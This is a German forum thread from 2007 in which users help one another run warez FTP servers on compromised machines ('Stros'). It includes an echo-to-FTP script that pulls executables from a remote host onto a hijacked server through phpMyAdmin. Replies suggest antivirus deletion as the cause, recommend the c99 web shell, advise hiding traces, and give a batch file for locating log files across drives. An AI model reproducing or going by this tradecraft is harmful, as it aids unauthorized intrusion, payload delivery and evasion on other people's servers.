Welcher Prozess verantwortlich oder wo ist meine exe?

martin05 · 20. Juni 2007

Da es sich hier um einen anderen Server handelt, ein extra Thread.

Sobald ich meine Daten per ftp auf den künftigen Stro hochlade finde ich meine (gemoddete) serv-u nicht im Verzeichnis.
Kann es sein, dass sich die exe in einem anderen Verzeichnis befindet??(
Wie lautet der Befehl zum Suchen der Datei?

Ich habe schon probiert mir das Windows\system32\ Verzeichnis anzeigen zu lassen, doch darauf habe ich so keine Rechte.

Oder ist evtl. einer der folgenden Prozesse dafür verantwortlich das meine exe "gelöscht" wurde?8o

Code:

Name Pid Pri Thd Hnd Mem User Time Kernel Time Elapsed Time
Idle 0 0 1 0 16 0:00:00.000 3:18:50.015 0:00:00.000
System 4 8 81 1034 292 0:00:00.000 0:01:16.171 0:00:00.000
smss 652 11 3 21 412 0:00:00.015 0:00:00.046 4:19:27.765
csrss 700 13 11 487 5184 0:00:01.593 0:00:05.359 4:19:25.515
winlogon 724 13 15 415 2096 0:00:00.546 0:00:01.281 4:19:25.140
services 768 9 15 295 4340 0:00:00.250 0:00:01.781 4:19:22.937
lsass 780 9 20 351 1376 0:00:00.750 0:00:00.453 4:19:22.906
svchost 928 8 15 205 5076 0:00:00.046 0:00:00.062 4:19:21.937
svchost 984 8 13 281 6168 0:00:00.125 0:00:00.250 4:19:21.671
svchost 1064 8 63 1316 21744 0:00:01.453 0:00:01.078 4:19:21.578
svchost 1112 8 7 84 4808 0:00:00.046 0:00:00.078 4:19:21.515
svchost 1196 8 15 213 6508 0:00:00.062 0:00:00.015 4:19:20.937
spoolsv 1340 8 12 156 5732 0:00:00.109 0:00:00.125 4:19:20.546
Apache 1472 8 6 96 8584 0:00:00.109 0:00:00.187 4:19:10.375
BTNtService 1484 13 6 80 2428 0:00:00.031 0:00:00.000 4:19:10.328
svchost 1504 8 3 73 3304 0:00:00.015 0:00:00.031 4:19:10.265
SAgent2 1524 8 13 109 5148 0:00:00.031 0:00:00.078 4:19:10.140
E_S00RP2 1548 8 3 31 1688 0:00:00.031 0:00:00.015 4:19:10.062
mdm 1632 8 4 82 2524 0:00:00.015 0:00:00.109 4:19:09.437
mysqld-nt 1664 8 18 4460 14708 0:00:00.218 0:00:00.234 4:19:09.343
Apache 1800 8 56 349 21632 0:00:02.281 0:00:00.843 4:19:06.296
StarWindSer 356 8 6 87 4364 0:00:00.046 0:00:00.140 4:19:01.453
alg 452 8 13 207 5856 0:00:00.062 0:00:00.078 4:18:56.015
explorer 2568 8 11 443 27516 0:00:01.640 0:00:10.125 4:18:10.953
ctfmon 2628 8 1 107 3860 0:00:00.062 0:00:00.078 4:18:10.031
nod32krn 2996 8 36 317 29036 0:01:04.953 0:00:10.218 0:01:23.812
cmd 3368 8 1 74 2572 0:00:00.015 0:00:00.031 0:00:00.109
pslist 3372 13 2 135 1940 0:00:00.015 0:00:00.031 0:00:00.062

Fport zeigt mir noch weniger an......
Killen des Prozesses nod32krn bringt nichts da dieser sofort unter einer anderen Pid wieder da ist.

Anzeige

unicat18 · 20. Juni 2007

AW: Welcher Prozess verantwortlich oder wo ist meine exe?

hi

also das hört sich für mich sehr nach troja oder einen wurm an.

mein tipp: überprüf mal alle deine platen mit anti-vir.

wenn das nicht geht gehe auf ausführen und gib dann mal mcconfic ein und probier es dann mal zu löschen.

hoffe ich konnte helfen

mfg unicat18

Halloweenracer · 20. Juni 2007

AW: Welcher Prozess verantwortlich oder wo ist meine exe?

lol, da is mist... er sucht ne datei auf nem stro.. nix anderes...

evtl hat nen av dein file gelöscht... oder wurde net übertragen

mfg

martin05 · 20. Juni 2007

AW: Welcher Prozess verantwortlich oder wo ist meine exe?

Naja, übertragen wurde die exe bestimmt.
Siehst du evtl. oben einen Prozess der dafür verantwortlich sein könnte die exe zu löschen??(

Halloweenracer · 21. Juni 2007

AW: Welcher Prozess verantwortlich oder wo ist meine exe?

hat wohl auch seinen grund

sag erstmal, um was es sich genau handelt... du sagst, du hast keine rechte das system32 dir zu listen?

also dir c(oder d, e, f ....):\windows(evlt auch winnt)\system32 geht nicht? da kommt nix?

wenn ja, denn sag mal an, über was du deine commands ausführst... nen mssql server? nen pma?

und wenn das file übertragen wurde, dann gibts nur 3 möglichkeiten...

1. das file ist da
2. das file wurde gelöscht (zb durch nod32)
3. das file ist da, aber in nem anderen verzeichnis....

wo genau du deine files hinlädst, dann kann man dir sagen, wenn du uns mal deine methode sagst, wie du die daten uppst... z.b echo methode (dann poste mal dein script)

naja bla blubb und wusa....^^

martin05 · 21. Juni 2007

AW: Welcher Prozess verantwortlich oder wo ist meine exe?

Kommt nix, habs schon mit versch. Laufwerksbuchstaben probiert.
Es fehlen da bestimmt die Rechte!

PMA

Zu 1) wenns da wäre wo ich es per echo-Script hochlade, dann würde ichs per "dir" sehen.
Zu 2) davon gehe ich im Moment eher aus.;(
Zu 3) wie lautet der Befehl um z.B. auf Laufwerk c: die exe zu suchen??(

Hier das Script, das ich immer nutze:

Code:

echo open IP>>c:\temp.txt
echo USER>>c:\temp.txt
echo PW>>c:\temp.txt

echo BINARY>>c:\temp.txt
echo get *****.exe>>c:\temp.txt
echo get *****>>c:\temp.txt
echo get *****.exe>>c:\temp.txt
echo get *****.exe>>c:\temp.txt
echo get *****.exe>>c:\temp.txt
echo quit>>c:\temp.txt
ftp -s:c:\temp.txt

Das Script funktioniert - daran kanns net liegen.
Wenn die Files nach dem Hochladen nicht auf c: zu sehen sind, habe ich immer ins System32-Verzeichnis geschaut - wenn man Rechte dazu hat - hat man ja leider nicht immer.

Halloweenracer · 21. Juni 2007

AW: Welcher Prozess verantwortlich oder wo ist meine exe?

wenn es dann auch wirklich da ist, dann ja.. (vorrausgesetzt du hast die rechte)

wenn du aber so schön sagst: "wenns nicht auf c:\ ist, dann hab ichs meistens im system32 gefunden" --> wenn du keine rechte fürs system32 hast, wirst du da auch nichmal was hochladen können

und ps: is nich grad schlau, sein echoscript ins c:\ zu legen... (auch wenn dus danach löscht - nicht wie manch anderer...)

ich würde dir vllt ne c99 shell ans herz legen, weil du da dann siehst, in welchem verzeichnis du welche rechte hast... würde vllt für dich bissel einfacher sein...

die shell findest bei google.de

mfg Halloweenracer

//

achso übrigens...

@echo off
dir C:\*.log /s /b >> logs.txt
dir D:\*.log /s /b >> logs.txt
dir E:\*.log /s /b >> logs.txt
exit

könnte dir evtl bei deinen logfiles behilflich sein... und natürlich auch bei deiner "exe suche" ^^

Nützliche Suchen

Welcher Prozess verantwortlich oder wo ist meine exe?

Videos zum Themenbereich